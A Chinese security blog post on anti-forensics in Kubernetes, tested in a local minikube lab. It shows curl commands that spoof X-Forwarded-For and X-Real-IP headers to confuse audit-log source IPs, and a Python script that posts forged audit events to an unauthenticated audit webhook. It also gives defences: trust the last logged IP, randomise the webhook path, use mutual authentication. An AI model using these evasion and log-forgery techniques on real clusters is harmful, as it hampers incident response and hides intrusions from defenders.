长亭百川云 - 文章详情

k8s被黑真能溯源到攻击者吗?

lufei

25

2024-08-20


一、前言

最近在做k8s的防御策略,以攻击者视角去思考下,发现可以对k8s的日志进行混淆,增加防御侧溯源的成本。

二、混淆来源IP

2.1、两个可以伪造的header头

k8s日志会记录两个Header头的IP:X-Forwarded-For、X-Real-IP

这里伪造X-Forwarded-For头

1curl --cert /root/.minikube/profiles/minikube/client.crt --key /root/.minikube/profiles/minikube/client.key -X GET https://192.168.49.2:8443/api/v1/pods -k -H 'User-Agent: ' -H 'X-Forwarded-For: 192.168.49.1192.168.49.2192.168.49.3192.168.49.4192.168.49.5192.168.49.6192.168.49.7192.168.49.8192.168.49.9192.168.49.10192.168.49.11192.168.49.12192.168.49.13192.168.49.14192.168.49.15192.168.49.17192.168.49.18192.168.49.19192.168.49.20192.168.49.21192.168.49.22192.168.49.23192.168.49.24192.168.49.25192.168.49.26192.168.49.27192.168.49.28192.168.49.29192.168.49.30192.168.49.31192.168.49.32192.168.49.33192.168.49.34192.168.49.35192.168.49.36192.168.49.37192.168.49.38192.168.49.39192.168.49.40192.168.49.41192.168.49.42192.168.49.43192.168.49.44192.168.49.45192.168.49.46192.168.49.47192.168.49.48192.168.49.49192.168.49.50192.168.49.51192.168.49.52192.168.49.53192.168.49.54192.168.49.55192.168.49.56192.168.49.57192.168.49.58192.168.49.59192.168.49.60192.168.49.61192.168.49.62192.168.49.63192.168.49.64192.168.49.65192.168.49.66192.168.49.67192.168.49.68192.168.49.69192.168.49.70192.168.49.71192.168.49.72192.168.49.73192.168.49.74192.168.49.75192.168.49.76192.168.49.77192.168.49.78192.168.49.79192.168.49.80192.168.49.81192.168.49.82192.168.49.83192.168.49.84192.168.49.85192.168.49.86192.168.49.87192.168.49.88192.168.49.89192.168.49.90192.168.49.91192.168.49.92192.168.49.93192.168.49.94192.168.49.95192.168.49.96192.168.49.97192.168.49.98192.168.49.99192.168.49.100192.168.49.101192.168.49.102192.168.49.103192.168.49.104192.168.49.105192.168.49.106192.168.49.107192.168.49.108192.168.49.109192.168.49.110192.168.49.111192.168.49.112192.168.49.113192.168.49.114192.168.49.115192.168.49.116192.168.49.117192.168.49.118192.168.49.119192.168.49.120192.168.49.121192.168.49.122192.168.49.123192.168.49.124192.168.49.125192.168.49.126192.168.49.127192.168.49.128192.168.49.129192.168.49.130192.168.49.131192.168.49.132192.168.49.133192.168.49.134192.168.49.135192.168.49.136192.168.49.137192.168.49.138192.168.49.139192.168.49.140192.168.49.141192.168.49.142192.168.49.143192.168.49.144192.168.49.145192.168.49.146192.168.49.147192.168.49.148192.168.49.149192.168.49.150192.168.49.151192.168.49.152192.168.49.153192.168.49.154192.168.49.155192.168.49.156192.168.49.157192.168.49.158192.168.49.159192.168.49.160192.168.49.161192.168.49.162192.168.49.163192.168.49.164192.168.49.165192.168.49.166192.168.49.167192.168.49.168192.168.49.169192.168.49.170192.168.49.171192.168.49.172192.168.49.173192.168.49.174192.168.49.175192.168.49.176192.168.49.177192.168.49.178192.168.49.179192.168.49.180192.168.49.181192.168.49.182192.168.49.183192.168.49.184192.168.49.185192.168.49.186192.168.49.187192.168.49.188192.168.49.189192.168.49.190192.168.49.191192.168.49.192192.168.49.193192.168.49.194192.168.49.195192.168.49.196192.168.49.197192.168.49.198192.168.49.199192.168.49.200192.168.49.201192.168.49.202192.168.49.203192.168.49.204192.168.49.205192.168.49.206192.168.49.207192.168.49.208192.168.49.209192.168.49.210192.168.49.211192.168.49.212192.168.49.213192.168.49.214192.168.49.215192.168.49.216192.168.49.217192.168.49.218192.168.49.219192.168.49.220192.168.49.221192.168.49.222192.168.49.223192.168.49.224192.168.49.225192.168.49.226192.168.49.227192.168.49.228192.168.49.229192.168.49.230192.168.49.231192.168.49.232192.168.49.233192.168.49.234192.168.49.235192.168.49.236192.168.49.237192.168.49.238192.168.49.239192.168.49.240192.168.49.241192.168.49.242192.168.49.243192.168.49.244192.168.49.245192.168.49.246192.168.49.247192.168.49.248192.168.49.249192.168.49.250192.168.49.251192.168.49.252192.168.49.253192.168.49.254'

这里伪造X-Real-IP,但是只能伪造一个ip

1curl --cert /root/.minikube/profiles/minikube/client.crt --key /root/.minikube/profiles/minikube/client.key -X GET https://192.168.49.2:8443/api/v1/pods -k -H 'User-Agent: ' -H 'X-Real-IP: 192.168.49.2'

2.2、如何解决?

k8s日志还是会记录到真实的ip,并且真实的ip总是在最后面(一开始以为会对ip进行排序,我尝试修改ip地址,无任何效果),所以防守方只要看最后的IP即可。

三、向webhook提交虚假日志

3.1、webhook地址没有鉴权

一般企业内部会有统一的k8s平台,一般也会配置一个统一的webhook地址,这个时候我们就可以进行混淆。

通过打印数据包,发现格式如下。

如果被发现了就可以释放烟雾弹进行混淆。

1import requests
2
3
4test_str = """
5{
6   "kind": "EventList",
7   "apiVersion": "audit.k8s.io/v1",
8   "metadata": {},
9   "items": [
10      {
11         "level": "Metadata",
12         "auditID": "415774d8-93ed-489c-a1ae-47fe6a501d37",
13         "stage": "RequestReceived",
14         "requestURI": "/api/v1/configmaps",
15         "verb": "list",
16         "user": {
17            "username": "system:serviceaccount:default:lufeitest3",
18            "uid": "178c3130-6925-4d81-8ce4-5d1cd61fd7f1",
19            "groups": [
20                "system:serviceaccount:default",
21                "system:authenticated"
22            ],
23            "extra": {
24               "authentication.kubernetes.io/credential-id": [
25                  "JTI=53561be6-c4c0-4cbe-9552-cf149868ce19"
26               ],
27               "authentication.kubernetes.io/node-name": [
28                  "minikube"
29               ],
30               "authentication.kubernetes.io/node-uid": [
31                  "1338157d-fe1d-445e-8700-60fb8eab6b34"
32               ],
33               "authentication.kubernetes.io/pod-name": [
34                  "agones-controller-6b7f66b857-57ffx"
35               ],
36               "authentication.kubernetes.io/pod-uid": [
37                  "2506dfe0-8283-45c0-9507-1ff0cc686e87"
38               ]
39            }
40         },
41         "sourceIPs": [
42            "10.244.0.89"
43         ],
44         "userAgent": "curl",
45         "objectRef": {
46            "resource": "leases",
47            "namespace": "default",
48            "name": "agones-controller-lock",
49            "apiGroup": "coordination.k8s.io",
50            "apiVersion": "v1"
51         },
52         "requestReceivedTimestamp": "2024-08-02T09:57:28.634829Z",
53         "stageTimestamp": "2024-08-02T09:57:28.634829Z"
54      }
55   ]
56}
57"""
58
59
60rsp = requests.post("http://127.0.0.1/", data=test_str,
61                    headers={'Content-Type': 'application/json'})
62print(rsp.text)

3.2、如何解决?

1、可以随机url中的path,从而避免攻击者获知地址。

2、群友说可以做双向验证,暂时没有实践。

四、总结

利用上面两个小trick可以增加防御方分析、溯源攻击的成本。前段时间实战的case比较有意思:从k8s环境外成为k8s node权限,再获取到集群权限。有时间分享出来:)


社群:加我lufeirider微信进群。

知识星球:关注攻击(红蓝对抗、代码审计、渗透、SRC漏洞挖掘等等)与防御(情报、扫描器、应用扫描、WAF、NIDS、HIDS、蜜罐等等)。目前聚焦ai落地攻击和防御。




攻防与防御回顾

“VT全绿”-手动patch exe免杀

最近CDN供应链事件的曲折分析与应对-业务安全

加载数据集或模型可能就中毒!大模型供应链安全

AI与基础安全结合的新的攻击面

AI落地-蓝军之默认密码获取

BootCDN供应链攻击分析与应对

挖洞技巧-扩展攻击面

weblogic-2019-2725exp回显构造

WEB越权-劝你多删参数值

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2